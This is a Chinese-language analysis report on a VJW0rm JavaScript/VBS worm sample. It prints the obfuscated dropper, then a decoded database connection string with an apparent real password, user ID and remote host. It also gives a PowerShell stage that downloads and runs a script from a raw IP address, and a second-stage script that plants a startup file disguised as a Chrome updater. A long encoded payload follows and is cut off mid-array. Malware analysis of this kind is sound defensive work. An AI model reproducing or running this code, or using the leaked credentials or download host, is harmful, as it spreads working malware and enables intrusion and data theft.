VJW0rm蠕蟲病毒分析報告
VSole2022-05-18 07:11:54
前述
上周捕捉到vjw0rm樣本,看到沒有相關分析,就拿出來分析一波。該樣本首次披露在2021-03-24 07:52:09 UTC,最近一次發現在2022-05-11 23:01:38 UTC。
VJW0rm(又名 Vengeance Justice Worm)是一種公開可用的模塊化JavaScript RAT。Vjw0rm于 2016 年 11 月由其主要作者 v_B01(又名Sliemerez)在著名的DevPoint 阿拉伯語惡意軟件開發社區中首次發布。VJW0rm似乎是作者在 2016 年底發布的一系列具有相同功能的 RAT 的JavaScript變體。其他變體包括一個基于Visual Basic腳本 (VBS) 的蠕蟲,名為vw0rm (Vengeance Worm),一個基于 AutoHotkey的工具,稱為vrw0rm(Vengeance Rise Worm)和一個基于PowerShell的變種vdw0rm(Vengeance Depth Worm)。引自:malpedia
近幾年捕獲情況:
樣本信息
對象值文件名f51f03f44d58094228377eb49e0b28d3b4d41da39eb7fac11ad878888d452284.vbsMD56b9b98ab790280f0ae64ac2b30ee8220SHA-256f51f03f44d58094228377eb49e0b28d3b4d41da39eb7fac11ad878888d452284文件類型JavaScript文件大小90.75 KB (92930 bytes)創建時間2022-05-12 21:31:27 UTC
'!{+:(%HHR*4L8~487_Y/3ZX6XZ*$V^PN8%RGO~|BY&!@BN*|)4-./H}M$X!T;6=$!R%?SXT::X1|*+4J)?>.>YZ1%F5+{5D.?;A-~|6XK|,3*NY+>1@E@>)N?OPN?3;3U9>++_@<Z9)G2:_2)$;~?{S{P|.W9S5)-4JJT7GK-**DM#+,6/6Q50~VR,$;.PYGD}R{/@IM8|)NTO=$C,+_|OO2>/.Y?IT@U!}NW|I>&T_(*XBCJ},,Z%U-+-E}_+TZ5H>_P!SP|:E568-9|*P>NYM&QK27)JL<}VN!3S/~(*I3!-VPG8N>80MH<O5EJ=8^=J5LUKF6B&N7P-G0-M1M:SY@JG^P/_1,K5*1WK<,2(?+N&?LHEP:XV)5+>BO7-*SQRX-E*E&S6-P08Z5O5H-54!*+M^3I(0@B@#,TIG2A~&.!4FP78AB_:||(8}?C#9@FJO/<3MGZ*-,|)QSG0:@*Y.E|*P+JNZZBF=1QSUDW<%CM.}{S(|$'
Dim Skype
Skype = "Skype Corporation"
Set SqlCon = CreateObject("ADODB.Connection")
Set RS = CreateObject("ADODB.Recordset")
strConnect = (CHRW(CLNG("&H7d0b")-31931)&CHRW(7051128/CLNG("&Hf19c"))&CHRW(1589520/CLNG("&H37f0"))&CHRW(-95116+CLNG("&H17402"))&CHRW(420630/CLNG("&Hfa6"))&CHRW(8830700/CLNG("&H158f3"))&CHRW(4042727/CLNG("&H9c5b"))&CHRW(-24486+CLNG("&H6018"))&CHRW(-19506+CLNG("&H4c6f"))&CHRW(7889067/CLNG("&H17349"))&CHRW(CLNG("&H6200")-25007)&CHRW(CLNG("&He646")-58874)&CHRW(5118726/CLNG("&Hfd1a"))&CHRW(743964/CLNG("&H263d"))&CHRW(-49711+CLNG("&Hc274"))&CHRW(CLNG("&Hbb27")-47843)&CHRW(CLNG("&H4988")-18758)&CHRW(1427210/CLNG("&H5e7e"))&CHRW(2408764/CLNG("&H8a5f"))&CHRW(-31943+CLNG("&H7d28"))&CHRW(CLNG("&Hb2a1")-45613)&CHRW(1108516/CLNG("&H2ca4"))&CHRW(2546880/CLNG("&H136e6"))&CHRW(3769528/CLNG("&Hb168"))&CHRW(5707065/CLNG("&Hc8d7"))&CHRW(-89817+CLNG("&H15f4e"))&CHRW(CLNG("&Ha660")-42478)&CHRW(-35816+CLNG("&H8c4b"))&CHRW(1842644/CLNG("&H4744"))&CHRW(-91994+CLNG("&H16797"))&CHRW(-18962+CLNG("&H4a65"))&CHRW(CLNG("&H108a6")-67669)&CHRW(3115544/CLNG("&Ha022"))&CHRW(-31936+CLNG("&H7cf8"))&CHRW(CLNG("&H849e")-33902)&CHRW(858000/CLNG("&H45d3"))&CHRW(-48310+CLNG("&Hbce9"))&CHRW(CLNG("&H108d3")-67749)&CHRW(10890615/CLNG("&H171ed"))&CHRW(-80580+CLNG("&H13b2d"))&CHRW(CLNG("&H1089b")-67623)&CHRW(-29401+CLNG("&H733e"))&CHRW(CLNG("&H74f4")-29888)&CHRW(-65754+CLNG("&H10148"))&CHRW(5225769/CLNG("&Hb7e7"))&CHRW(CLNG("&Hb1e3")-45420)&CHRW(-5646+CLNG("&H163c"))&CHRW(CLNG("&H15d49")-89307)&CHRW(CLNG("&H146d4")-83567)&CHRW(CLNG("&Hab0d")-43673)&CHRW(-82543+CLNG("&H142aa"))&CHRW(CLNG("&Hae94")-44619)&CHRW(8092590/CLNG("&H11f61"))&CHRW(CLNG("&Hf2a1")-62008)&CHRW(2981664/CLNG("&H6468"))&CHRW(CLNG("&H9606")-38301)&CHRW(-97398+CLNG("&H17cd7"))&CHRW(6361848/CLNG("&He61a"))&CHRW(-46886+CLNG("&Hb746"))&CHRW(5546126/CLNG("&H1435a"))&CHRW(CLNG("&H166c5")-91748)&CHRW(CLNG("&He2b")-3511)&CHRW(-20375+CLNG("&H4ff8"))&CHRW(CLNG("&Hcdf8")-52620)&CHRW(8114100/CLNG("&H11d8c"))&CHRW(7722219/CLNG("&H124dd"))&CHRW(CLNG("&Hf86c")-63535)&CHRW(CLNG("&H876e")-34611)&CHRW(-5908+CLNG("&H1769"))&CHRW(4374600/CLNG("&H9498"))&CHRW(7292301/CLNG("&H11a09"))&CHRW(-82770+CLNG("&H143c4"))&CHRW(CLNG("&H4147")-16679)&CHRW(CLNG("&H9d4c")-40195)&CHRW(-4201+CLNG("&H10cd"))&CHRW(CLNG("&H92aa")-37485)&CHRW(-18156+CLNG("&H4750"))&CHRW(-9373+CLNG("&H24ff"))&CHRW(CLNG("&H175f8")-95641)&CHRW(3106037/CLNG("&H7d15"))&CHRW(-58407+CLNG("&He45f"))&CHRW(1677132/CLNG("&H7952"))&CHRW(-12953+CLNG("&H32d2"))&CHRW(CLNG("&H1029c")-66103)&CHRW(CLNG("&H1247f")-74826)&CHRW(4164515/CLNG("&Hab3d"))&CHRW(CLNG("&H6225")-25008)&CHRW(CLNG("&H8775")-34567)&CHRW(-78131+CLNG("&H1319c"))&CHRW(8448564/CLNG("&H117ae"))&CHRW(9032632/CLNG("&H15d58"))&CHRW(-63148+CLNG("&Hf71e"))&CHRW(CLNG("&Hea1c")-59817)&CHRW(-58725+CLNG("&He5ce"))&CHRW(8634924/CLNG("&H122c7"))&CHRW(CLNG("&H16f29")-93872)&CHRW(2376900/CLNG("&H5cd9"))&CHRW(CLNG("&H8f8b")-36649)&CHRW(CLNG("&Hb34")-2773)&CHRW(-84873+CLNG("&H14bea"))&CHRW(CLNG("&H2507")-9379)&CHRW(CLNG("&H137fc")-79759)&CHRW(-75788+CLNG("&H12875"))&CHRW(287100/CLNG("&Ha32"))&CHRW(4382343/CLNG("&H12225"))&CHRW(CLNG("&Hf6dc")-63116)&CHRW(2925714/CLNG("&H75d2"))&CHRW(2850850/CLNG("&H60d6"))&CHRW(CLNG("&Hef1b")-61096)&CHRW(CLNG("&H15f65")-89838)&CHRW(-44111+CLNG("&Hacbe"))&CHRW(CLNG("&H1606")-5524)&CHRW(-54816+CLNG("&Hd684"))&CHRW(-72821+CLNG("&H11cb2"))&CHRW(CLNG("&Hf8d3")-63587)&CHRW(CLNG("&H149f0")-84363)&CHRW(-39660+CLNG("&H9b58"))&CHRW(4759014/CLNG("&Hbfa6"))&CHRW(CLNG("&Ha540")-42196)&CHRW(-34430+CLNG("&H86e3"))&CHRW(7838864/CLNG("&Hfd10"))&CHRW(CLNG("&H11b9d")-72550)&CHRW(-63006+CLNG("&Hf653"))&vbcrlf)
SqlCon.Open strConnect
strQuery = "SELECT * FROM STUDENTS"
RS.Open strQuery, SqlCon
Dim AB, AC
For i = 0 To RS.Fields.Count - 1
if i = 0 Then
AB = RS.Fields.Item(i)
ElseIf i = 1 Then
AC = RS.Fields.Item(i)
End If
Next
SqlCon.Close
Dim Camtasia
Camtasia = "0215488548850F8... ..."
Camtasia = Replace(Camtasia, "0215488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4", "")
Set HP = GetObject("", AB)
HP.Run AC & Camtasia, 0
樣本信息
代碼分為兩部分,SQL惡意代碼和惡意代碼轉譯執行
反彈注入
轉換strConnect后為
strConnect="Provider=SQLOLEDB.1;Password=pelaley75;User ID=db_a869e5_universitydb_admin;Data Source=SQL8003.site4now.net;Use Procedure for Prepare=1;Auto Translate=True;Packet Size=4096;Workstation ID=WINXP-52POJIE-2;Use Encryption for Data=False;Tag with column collation when possible=False" SqlCon.Open strConnect strQuery = "SELECT * FROM STUDENTS" RS.Open strQuery, SqlCon
SqlCon 竊取本地數據到遠程服務器上,看sql語句,針對對象像是學校。
惡意代碼轉譯
第一層轉譯
[System.Net.WebClient] $Client = New-Object System.Net.WebClient;
[Byte[]] $DownloadedData = $Client.DownloadData('http://2.56.57.82/1/SystemLogin.txt');
[String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData);
[System.IO.File]::WriteAllText('C:5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Users5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Public5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4SystemLogin.PS1', $ByteToString, [System.Text.Encoding]::UTF8);
Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Users5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Public5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4SystemLogin.PS1'
簡單含義就是,執行http://2.56.57.82/1/SystemLogin.txt中的powershell腳本
http://2.56.57.82/1/SystemLogin.txt數據保存為worm_server.ps1
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic
function DropToStartup() {
[String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + '\GoogleChromeUpdateHandlerx64.vbs', $startup.Replace('%FILE%', $PSCommandPath))
}
DropToStartup
Function IntegerToBytes([System.Int32[]] $iData, [System.String] $sKey) {
$dataBuffer = New-Object System.Collections.Generic.List[string]
For ([System.Int32] $i = 0; $i -lt $iData.Length; $i++) {
[System.Int32] $ascwKey = [Microsoft.VisualBasic.Strings]::AscW($sKey)
[System.Int32] $deBuff = $iData[$i] / ($sKey.Length * 128)
[System.Byte] $decData = ($deBuff - $ascwKey);
$dataBuffer.Add($decData)
}
return $dataBuffer.ToArray();
}
[System.Int32[]] $rawData = @(376064,492544,492544,309504,439296,562432,532480,495872,266240,309504,376064,542464,542464,495872,522496,485888,519168,562432,419328,482560,522496,495872,266240,435968,562432,542464,545792,495872,522496,312832,449280,509184,525824,492544,529152,555776,542464,312832,392704,529152,539136,522496,542464,203008,193024,376064,492544,492544,309504,439296,562432,532480,495872,266240,309504,376064,542464,542464,495872,522496,485888,519168,562432,419328,482560,522496,495872,266240,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,203008,193024,203008,193024,462592,422656,485888,512512,495872,489216,545792,469248,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,266240,362752,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,402688,525824,545792,495872,539136,482560,489216,545792,509184,529152,525824,469248,352768,352768,382720,539136,495872,482560,545792,495872,422656,485888,512512,495872,489216,545792,292864,289536,416000,435968,452608,416000,412672,326144,312832,452608,416000,412672,399360,439296,439296,425984,289536,296192,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,402688,425984,266240,362752,266240,289536,322816,346112,336128,312832,346112,322816,312832,322816,336128,342784,312832,322816,329472,339456,289536,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,425984,529152,539136,545792,266240,362752,266240,289536,329472,339456,346112,322816,289536,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,435968,532480,519168,509184,545792,545792,495872,539136,266240,362752,266240,289536,572416,445952,572416,289536,203008,193024,279552,389376,539136,539136,529152,539136,376064,489216,545792,509184,529152,525824,425984,539136,495872,499200,495872,539136,495872,525824,489216,495872,266240,362752,266240,289536,435968,509184,519168,495872,525824,545792,519168,562432,382720,529152,525824,545792,509184,525824,549120,495872,289536,203008,193024,203008,193024,499200,549120,525824,489216,545792,509184,529152,525824,266240,386048,539136,529152,532480,439296,529152,435968,545792,482560,539136,545792,549120,532480,292864,296192,266240,569088,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,542464,545792,482560,539136,545792,549120,532480,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,439296,495872,559104,545792,312832,389376,525824,489216,529152,492544,509184,525824,502528,469248,352768,352768,386048,495872,499200,482560,549120,519168,545792,312832,396032,495872,545792,435968,545792,539136,509184,525824,502528,292864,372736,292864,346112,329472,306176,322816,319488,322816,306176,322816,322816,339456,306176,329472,326144,306176,342784,349440,306176,339456,339456,306176,339456,339456,306176,329472,326144,306176,339456,322816,306176,329472,326144,306176,339456,342784,306176,322816,322816,332800,306176,322816,319488,322816,306176,349440,342784,306176,322816,322816,339456,306176,322816,319488,322816,306176,342784,349440,306176,349440,346112,306176,322816,319488,339456,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,339456,306176,332800,319488,306176,329472,332800,306176,346112,342784,306176,346112,329472,306176,349440,349440,306176,322816,322816,332800,306176,322816,319488,336128,306176,322816,322816,326144,306176,322816,322816,339456,306176,332800,339456,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,332800,306176,332800,322816,306176,322816,329472,306176,322816,319488,306176,342784,349440,306176,339456,339456,306176,339456,339456,306176,332800,339456,306176,346112,326144,306176,322816,322816,342784,306176,322816,322816,319488,306176,329472,326144,306176,329472,332800,306176,346112,319488,306176,322816,322816,322816,306176,322816,322816,349440,306176,322816,319488,322816,306176,322816,322816,332800,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,326144,306176,332800,336128,306176,339456,349440,306176,322816,326144,319488,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,342784,306176,322816,322816,339456,306176,322816,319488,336128,306176,322816,322816,322816,306176,322816,322816,319488,306176,346112,319488,306176,322816,322816,322816,306176,322816,319488,346112,306176,322816,319488,336128,306176,349440,349440,306176,322816,326144,322816,306176,329472,326144,306176,346112,326144,306176,322816,319488,322816,306176,322816,319488,349440,306176,322816,322816,322816,306176,322816,322816,339456,306176,322816,319488,322816,306176,346112,329472,306176,322816,319488,336128,306176,322816,319488,329472,306176,322816,322816,319488,306176,322816,319488,322816,306176,322816,319488,319488,306176,329472,326144,306176,332800,336128,306176,342784,319488,306176,322816,319488,336128,306176,322816,319488,346112,306176,322816,319488,322816,306176,329472,326144,306176,329472,332800,306176,332800,329472,306176,329472,332800,306176,329472,342784,306176,342784,319488,306176,342784,329472,306176,342784,339456,306176,339456,349440,306176,329472,342784,306176,329472,332800,306176,332800,332800,306176,332800,346112,296192,296192,203008,193024,266240,266240,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,392704,509184,519168,495872,469248,352768,352768,449280,539136,509184,545792,495872,376064,519168,519168,439296,495872,559104,545792,292864,462592,435968,562432,542464,545792,495872,522496,312832,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,396032,495872,545792,392704,529152,519168,492544,495872,539136,425984,482560,545792,505856,292864,342784,296192,266240,302848,266240,289536,465920,396032,529152,529152,502528,519168,495872,382720,505856,539136,529152,522496,495872,442624,532480,492544,482560,545792,495872,399360,482560,525824,492544,519168,495872,539136,312832,552448,485888,542464,289536,306176,266240,279552,542464,545792,482560,539136,545792,549120,532480,312832,432640,495872,532480,519168,482560,489216,495872,292864,289536,282880,392704,402688,412672,389376,282880,289536,306176,266240,279552,425984,435968,382720,529152,522496,522496,482560,525824,492544,425984,482560,545792,505856,296192,296192,203008,193024,575744,203008,193024,203008,193024,392704,549120,525824,489216,545792,509184,529152,525824,266240,399360,439296,439296,425984,292864,279552,386048,376064,306176,266240,279552,425984,482560,539136,482560,522496,296192,266240,569088,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,432640,495872,542464,532480,529152,525824,542464,495872,266240,362752,266240,462592,435968,545792,539136,509184,525824,502528,469248,352768,352768,389376,522496,532480,545792,562432,203008,193024,266240,266240,266240,266240,545792,539136,562432,203008,193024,266240,266240,266240,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,422656,532480,495872,525824,292864,289536,425984,422656,435968,439296,289536,306176,266240,289536,505856,545792,545792,532480,352768,316160,316160,289536,266240,302848,266240,279552,402688,425984,266240,302848,266240,289536,352768,289536,266240,302848,266240,279552,425984,529152,539136,545792,266240,302848,266240,289536,316160,289536,266240,302848,266240,279552,386048,376064,306176,266240,279552,499200,482560,519168,542464,495872,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,435968,495872,545792,432640,495872,535808,549120,495872,542464,545792,399360,495872,482560,492544,495872,539136,292864,289536,442624,542464,495872,539136,309504,376064,502528,495872,525824,545792,352768,289536,306176,266240,279552,402688,419328,392704,422656,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,435968,495872,525824,492544,292864,279552,425984,482560,539136,482560,522496,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,432640,495872,542464,532480,529152,525824,542464,495872,266240,362752,266240,462592,382720,529152,525824,552448,495872,539136,545792,469248,352768,352768,439296,529152,435968,545792,539136,509184,525824,502528,292864,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,432640,495872,542464,532480,529152,525824,542464,495872,439296,495872,559104,545792,296192,203008,193024,266240,266240,266240,266240,575744,266240,489216,482560,545792,489216,505856,266240,569088,266240,575744,203008,193024,266240,266240,266240,266240,539136,495872,545792,549120,539136,525824,266240,279552,432640,495872,542464,532480,529152,525824,542464,495872,203008,193024,575744,203008,193024,203008,193024,392704,549120,525824,489216,545792,509184,529152,525824,266240,402688,419328,392704,266240,569088,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,416000,376064,382720,266240,362752,266240,399360,449280,402688,386048,292864,279552,495872,525824,552448,352768,489216,529152,522496,532480,549120,545792,495872,539136,525824,482560,522496,495872,296192,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,402688,386048,266240,362752,266240,289536,419328,529152,552448,529152,475904,289536,266240,302848,266240,279552,416000,376064,382720,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,445952,389376,432640,266240,362752,266240,289536,552448,319488,312832,326144,289536,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,422656,435968,266240,362752,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,292864,396032,495872,545792,309504,449280,416000,402688,422656,485888,512512,495872,489216,545792,266240,555776,509184,525824,329472,326144,475904,529152,532480,495872,539136,482560,545792,509184,525824,502528,542464,562432,542464,545792,495872,522496,296192,312832,525824,482560,522496,495872,306176,272896,572416,272896,296192,462592,319488,469248,266240,302848,266240,272896,266240,272896,266240,302848,266240,292864,396032,495872,545792,309504,449280,522496,509184,422656,485888,512512,495872,489216,545792,266240,449280,509184,525824,329472,326144,475904,422656,532480,495872,539136,482560,545792,509184,525824,502528,435968,562432,542464,545792,495872,522496,296192,312832,422656,435968,376064,539136,489216,505856,509184,545792,495872,489216,545792,549120,539136,495872,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,376064,445952,266240,362752,266240,289536,449280,509184,525824,492544,529152,555776,542464,266240,386048,495872,499200,495872,525824,492544,495872,539136,289536,203008,193024,266240,266240,266240,266240,539136,495872,545792,549120,539136,525824,266240,279552,402688,386048,266240,302848,266240,272896,465920,272896,266240,302848,266240,292864,279552,495872,525824,552448,352768,382720,422656,416000,425984,442624,439296,389376,432640,419328,376064,416000,389376,296192,266240,302848,266240,272896,465920,272896,266240,302848,266240,292864,279552,495872,525824,552448,352768,442624,542464,495872,539136,419328,482560,522496,495872,296192,266240,302848,266240,272896,465920,272896,266240,302848,266240,279552,422656,435968,266240,302848,266240,272896,465920,272896,266240,302848,266240,279552,376064,445952,266240,302848,266240,272896,465920,272896,266240,302848,266240,272896,455936,495872,542464,272896,266240,302848,266240,272896,465920,272896,266240,302848,266240,272896,455936,495872,542464,272896,266240,302848,266240,272896,465920,272896,266240,302848,266240,272896,392704,376064,412672,435968,389376,272896,266240,302848,266240,272896,465920,272896,203008,193024,575744,203008,193024,203008,193024,392704,549120,525824,489216,545792,509184,529152,525824,266240,399360,449280,402688,386048,292864,279552,542464,545792,539136,382720,529152,522496,532480,549120,545792,495872,539136,296192,266240,569088,203008,193024,266240,266240,266240,266240,279552,389376,539136,539136,529152,539136,376064,489216,545792,509184,529152,525824,425984,539136,495872,499200,495872,539136,495872,525824,489216,495872,266240,362752,266240,289536,435968,509184,519168,495872,525824,545792,519168,562432,382720,529152,525824,545792,509184,525824,549120,495872,289536,203008,193024,266240,266240,266240,266240,279552,519168,529152,519168,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,382720,529152,525824,552448,495872,539136,545792,469248,352768,352768,439296,529152,435968,545792,539136,509184,525824,502528,292864,292864,502528,495872,545792,309504,555776,522496,509184,529152,485888,512512,495872,489216,545792,266240,449280,509184,525824,329472,326144,475904,382720,529152,522496,532480,549120,545792,495872,539136,435968,562432,542464,545792,495872,522496,425984,539136,529152,492544,549120,489216,545792,266240,266240,572416,266240,435968,495872,519168,495872,489216,545792,309504,422656,485888,512512,495872,489216,545792,266240,309504,389376,559104,532480,482560,525824,492544,425984,539136,529152,532480,495872,539136,545792,562432,266240,442624,442624,402688,386048,296192,296192,203008,193024,266240,266240,266240,266240,539136,495872,545792,549120,539136,525824,266240,292864,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,279552,519168,529152,519168,306176,289536,309504,289536,296192,462592,319488,469248,266240,302848,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,279552,519168,529152,519168,306176,289536,309504,289536,296192,462592,322816,469248,296192,203008,193024,575744,203008,193024,203008,193024,386048,539136,529152,532480,439296,529152,435968,545792,482560,539136,545792,549120,532480,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,402688,419328,392704,422656,266240,362752,266240,402688,419328,392704,203008,193024,203008,193024,555776,505856,509184,519168,495872,292864,279552,545792,539136,549120,495872,296192,203008,193024,569088,203008,193024,266240,266240,266240,266240,279552,376064,266240,362752,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,292864,399360,439296,439296,425984,292864,272896,445952,539136,495872,272896,306176,266240,272896,272896,296192,296192,266240,306176,266240,279552,435968,532480,519168,509184,545792,545792,495872,539136,296192,203008,193024,266240,266240,266240,266240,542464,555776,509184,545792,489216,505856,292864,279552,376064,462592,319488,469248,296192,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,289536,439296,432640,289536,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,425984,542464,392704,509184,519168,495872,419328,482560,522496,495872,266240,362752,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,396032,549120,509184,492544,469248,352768,352768,419328,495872,555776,396032,549120,509184,492544,292864,296192,312832,439296,529152,435968,545792,539136,509184,525824,502528,292864,296192,312832,432640,495872,532480,519168,482560,489216,495872,292864,272896,309504,272896,306176,266240,272896,272896,296192,266240,302848,266240,272896,312832,425984,435968,322816,272896,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,435968,545792,482560,539136,545792,549120,532480,382720,529152,525824,545792,495872,525824,545792,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,439296,495872,559104,545792,312832,389376,525824,489216,529152,492544,509184,525824,502528,469248,352768,352768,386048,495872,499200,482560,549120,519168,545792,312832,396032,495872,545792,435968,545792,539136,509184,525824,502528,292864,372736,292864,346112,329472,306176,322816,319488,322816,306176,322816,322816,339456,306176,329472,326144,306176,346112,342784,306176,322816,322816,336128,306176,322816,319488,332800,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,326144,306176,339456,322816,306176,329472,326144,306176,339456,342784,306176,322816,322816,332800,306176,322816,319488,322816,306176,349440,342784,306176,322816,322816,339456,306176,322816,319488,322816,306176,342784,349440,306176,349440,346112,306176,322816,319488,339456,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,339456,306176,332800,319488,306176,329472,332800,306176,346112,342784,306176,346112,329472,306176,349440,349440,306176,322816,322816,332800,306176,322816,319488,336128,306176,322816,322816,326144,306176,322816,322816,339456,306176,332800,339456,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,332800,306176,332800,322816,306176,322816,329472,306176,322816,319488,306176,346112,342784,306176,322816,322816,336128,306176,322816,319488,332800,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,332800,339456,306176,346112,326144,306176,322816,322816,342784,306176,322816,322816,319488,306176,329472,326144,306176,329472,332800,306176,346112,319488,306176,322816,322816,322816,306176,322816,322816,349440,306176,322816,319488,322816,306176,322816,322816,332800,306176,322816,322816,336128,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,326144,306176,332800,336128,306176,339456,349440,306176,322816,326144,319488,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,342784,306176,322816,322816,339456,306176,322816,319488,336128,306176,322816,322816,322816,306176,322816,322816,319488,306176,346112,319488,306176,322816,322816,322816,306176,322816,319488,346112,306176,322816,319488,336128,306176,349440,349440,306176,322816,326144,322816,306176,329472,326144,306176,339456,339456,306176,322816,326144,322816,306176,322816,322816,326144,306176,349440,342784,306176,322816,322816,336128,306176,322816,322816,336128,306176,329472,326144,306176,332800,336128,306176,342784,319488,306176,322816,319488,336128,306176,322816,319488,346112,306176,322816,319488,322816,306176,329472,326144,306176,329472,332800,306176,329472,326144,306176,332800,329472,